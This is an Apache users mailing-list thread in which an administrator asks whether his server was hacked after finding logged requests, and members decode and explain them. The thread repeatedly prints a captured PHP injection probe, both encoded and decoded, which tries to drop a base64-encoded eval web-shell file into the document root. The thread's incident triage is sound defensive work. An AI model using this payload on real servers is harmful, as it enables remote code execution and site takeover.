subject:"\[users@httpd\] am i hacked \?"

Re: [users@httpd] am i hacked ?

2017-02-07 Thread Erik Dobák

with the current number of critters around probably yes.
E

On 6 February 2017 at 23:05, Wim Lewis  wrote:

>
> On 2/6/2017 8:36 AM, Jack Swan wrote:
> > What upsets me is that these two requests have statuscode 200, which
> mean it was successfull.
>
> As Jonesy points out, it's normal for the web server to simply ignore a
> request's query-string in a request where it wouldn't mean anything. So
> Apache is happily returning the result of "GET /" and ignoring the
> malicious probe.
>
> If you don't have PHP installed, you're safe from whatever this is. If the
> user your webserver runs as can't write to the documentroot or
> configuration directory, you're safe from whatever this is.
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Wim Lewis

On 2/6/2017 8:36 AM, Jack Swan wrote:
> What upsets me is that these two requests have statuscode 200, which mean it 
> was successfull.

As Jonesy points out, it's normal for the web server to simply ignore a 
request's query-string in a request where it wouldn't mean anything. So Apache 
is happily returning the result of "GET /" and ignoring the malicious probe.

If you don't have PHP installed, you're safe from whatever this is. If the user 
your webserver runs as can't write to the documentroot or configuration 
directory, you're safe from whatever this is. 

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Kent Frazier


If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).


test =""" 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90"""
import urllib.parse
print(urllib.parse.unquote(test))
import base64
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

It yields...
python unquote.py
 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo 
'->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
b''

I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.


python getAbuseEmail.py 91.200.12.33
['n...@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd




-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 8:22 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

>> OK. I think i understand most of it.
>> First the attacker sets some values appropriate for him. Then he tries to 
>> create
>> a file webconfig.txt.php and to write
>>  in it.
>> Fortunately wwwrun can't write in /sr/www ... , following
>> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
>> If he could create the file, then he is able to sent arbitrary stuff to it 
>> which
>> is executed by eval.
>> 
>> Some things are still unclear for me:
>> 
>> What is the purpose of the two echos ?
>> Why has the request status code 200 ?
>> What is the purpose of the 1 direct behind the question mark ?
>> What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm 
>> not
>> a php developer).
>> 
> 
> The @ in front of the function calls silence the errors:
> http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in
> 

Beside keeping apache and the OS fresh, what do you think of mod_security 
and/or AppArmor as an additional layer of security ?
I read that mod_security is quite complicated.

Bernd

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd


> OK. I think i understand most of it.
> First the attacker sets some values appropriate for him. Then he tries to 
> create
> a file webconfig.txt.php and to write
>  in it.
> Fortunately wwwrun can't write in /sr/www ... , following
> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
> If he could create the file, then he is able to sent arbitrary stuff to it 
> which
> is executed by eval.
> 
> Some things are still unclear for me:
> 
> What is the purpose of the two echos ?
> Why has the request status code 200 ?
> What is the purpose of the 1 direct behind the question mark ?
> What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm 
> not
> a php developer).
> 

The @ in front of the function calls silence the errors:
http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in

Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 6:32 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:
> 
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>> 
>> 
>> 
>> I didn't decode the remaining lines. I think they're just trying to do the 
>> same
>> thing.
>> 
>> 
> 
> You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is
> helpful.
> 
> 

OK. I think i understand most of it.
First the attacker sets some values appropriate for him. Then he tries to 
create a file webconfig.txt.php and to write
 in it.
Fortunately wwwrun can't write in /sr/www ... , following 
http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
If he could create the file, then he is able to sent arbitrary stuff to it 
which is executed by eval.

Some things are still unclear for me:

What is the purpose of the two echos ?
Why has the request status code 200 ?
What is the purpose of the 1 direct behind the question mark ?
What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm not 
a php developer).

Bernd

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Eric Covener

On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog  wrote:
> I see these type of attack strings all the time on Nginx except Nginx gives
> a 403. Apache is notoriously bad with security and giving 200 ok responses
> makes you  yourself. A reason  I and many other people have switched.
> User support on this list was also non existent when I ran into serious SSL
> problems with 2.4 that until today have been ignored and unanswered.

Was this your serious problem:

I am hoping someone can please give me a more concise description of
what the socache_shmcb module is and what it actually does. The
documentation at
https://httpd.apache.org/docs/2.4/mod/mod_socache_shmcb.html is very
vague and in 2 years has not changed. Google searches do not reveal
much information other than people on forums saying enable the module
for better performance and what not.

I just cannot get my head around what it is actually really designed
to do and if one was to use it how to configure it. Guess as I said it
will first help to know what it actually is.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:

> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
> 
> 
> 
> I didn't decode the remaining lines. I think they're just trying to do the 
> same
> thing.
> 
> 

You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is 
helpful.

Bernd

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Mitchell Krog

I see these type of attack strings all the time on Nginx except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 ok responses
makes you  yourself. A reason  I and many other people have switched.
User support on this list was also non existent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson"  wrote:

>
>
> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> 
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do
>>> the same
>>> thing.
>>>
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
>> belongs to root and user wwwrun
>> is not allowed to write there.
>>
>
> What seems to be happening here is that your system is being probed for
> vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes
> that it will not complain and write the string to the file
> webconfig.txt.php which the attacker would then attempt to get to with the
> real hack in the Posted contents. Are there any requests to get to that
> file?
>
> You should make sure you sanitized any input to your index.php and reject
> anything that's not expected.
>
> Ken
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Ken Robinson




On 2017-02-06 12:08 pm, Lentes, Bernd wrote:


The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:



I didn't decode the remaining lines. I think they're just trying to do 
the same

thing.


Fortunately there is no webconfig.txt.php. And all folders in /srv/www 
belongs to root and user wwwrun

is not allowed to write there.


What seems to be happening here is that your system is being probed for 
vulnerabilities.


The attacker is sending a payload string to your index.php file in hopes 
that it will not complain and write the string to the file 
webconfig.txt.php which the attacker would then attempt to get to with 
the real hack in the Posted contents. Are there any requests to get to 
that file?


You should make sure you sanitized any input to your index.php and 
reject anything that's not expected.


Ken

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd



> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
> 
> 
> 
> I didn't decode the remaining lines. I think they're just trying to do the 
> same
> thing.
> 

Fortunately there is no webconfig.txt.php. And all folders in /srv/www belongs 
to root and user wwwrun
is not allowed to write there.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote:

> Actually now that I re-read the requests it also looks as shellshock succesful
> attempt.
> Operative system software not updated recently either?

> 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > :

>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.

>> Do you use a very old php version as well?

Everything is old. php, OS, apache. This is to my account. It's a system i 
nearly oversaw, because we use it very rarely.
But nevertheless, it should be updated. I know. And i learn.

>>> What i find out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>>> '->|';file_put_contents($_SERVER['DOCUME
>>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>>> '|<-';

>>> Currently i don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>>> network which includes this ip.

>>> Thankful for any tip.

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan


The first line is trying to create the file webconfig.txt.php in your 
DOCUMENT_ROOT directory, with the contents of the file being:



I didn't decode the remaining lines. I think they're just trying to do the same 
thing.


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re: [users@httpd] am i hacked ?


- On Feb 6, 2017, at 5:14 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
> 
> just in the moment i found two very weird entries in may access_log:
> 
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have statuscode 200, which mean it 
> was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? 
> Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';

Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the 
network which includes this ip.

Thankful for any tip.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel

Actually now that I re-read the requests it also looks as shellshock
succesful attempt.

Operative system software not updated recently either?

2017-02-06 17:42 GMT+01:00 Daniel :

> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd  muenchen.de>:
>
>>
>> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
>> muenchen.de wrote:
>>
>> > Hi,
>> >
>> > just in the moment i found two very weird entries in may access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have statuscode 200, which
>> mean it was
>> > successfull.
>> > The IP is from ukraine. Where can i find out what these %charcacters
>> mean ? Does
>> > anyone understand what happened here ? It's apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>> >
>>
>> What i find out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>> '->|';file_put_contents($_SERVER['DOCUME
>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>> '|<-';
>>
>> Currently i don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>> network which includes this ip.
>>
>> Thankful for any tip.
>>
>>
>> Bernd
>>
>>
>> Helmholtz Zentrum Muenchen
>> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
>> Ingolstaedter Landstr. 1
>> 85764 Neuherberg
>> www.helmholtz-muenchen.de
>> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
>> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
>> Enhsen
>> Registergericht: Amtsgericht Muenchen HRB 6466
>> USt-IdNr: DE 129521671
>>
>>
>> -
>> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
>> For additional commands, e-mail: users-h...@httpd.apache.org
>>
>>
>
>
> --
> *Daniel Ferradal*
> IT Specialist
>
> email dferradal at gmail.com
> linkedin es.linkedin.com/in/danielferradal
>



-- 
*Daniel Ferradal*
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel

Have you tried to send those requests yourself and see what you get?

Still those requests seem to be aimed at your php framework.

Do you use a very old php version as well?

2017-02-06 17:41 GMT+01:00 Lentes, Bernd :

>
> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
> muenchen.de wrote:
>
> > Hi,
> >
> > just in the moment i found two very weird entries in may access_log:
> >
> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%
> 40set_time_limit%280%29%3B%40set_magic_quotes_runtime%
> 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%
> 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%
> 40set_time_limit%280%29%3B%40set_magic_quotes_runtime%
> 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%
> 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> >
> > What upsets me is that these two requests have statuscode 200, which
> mean it was
> > successfull.
> > The IP is from ukraine. Where can i find out what these %charcacters
> mean ? Does
> > anyone understand what happened here ? It's apache 2.2.3 64bit.
> >
> > Thanks for any hint.
> >
> > Bernd
> >
>
> What i find out already:
> https://url-encoder.de/ helped me to decode the URL:
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
> '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('
> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>
> Currently i don't understand what this means.
> I don't find a file webconfig.txt.php on my system.
> Currently no weird process, no new user in /etc/passwd, no packtes to the
> network which includes this ip.
>
> Thankful for any tip.
>
>
> Bernd
>
>
> Helmholtz Zentrum Muenchen
> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
> Ingolstaedter Landstr. 1
> 85764 Neuherberg
> www.helmholtz-muenchen.de
> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
> Enhsen
> Registergericht: Amtsgericht Muenchen HRB 6466
> USt-IdNr: DE 129521671
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>


-- 
*Daniel Ferradal*
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd


- On Feb 6, 2017, at 5:14 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
> 
> just in the moment i found two very weird entries in may access_log:
> 
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have statuscode 200, which mean it 
> was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? 
> Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';

Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the 
network which includes this ip.

Thankful for any tip.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan


I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.  

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
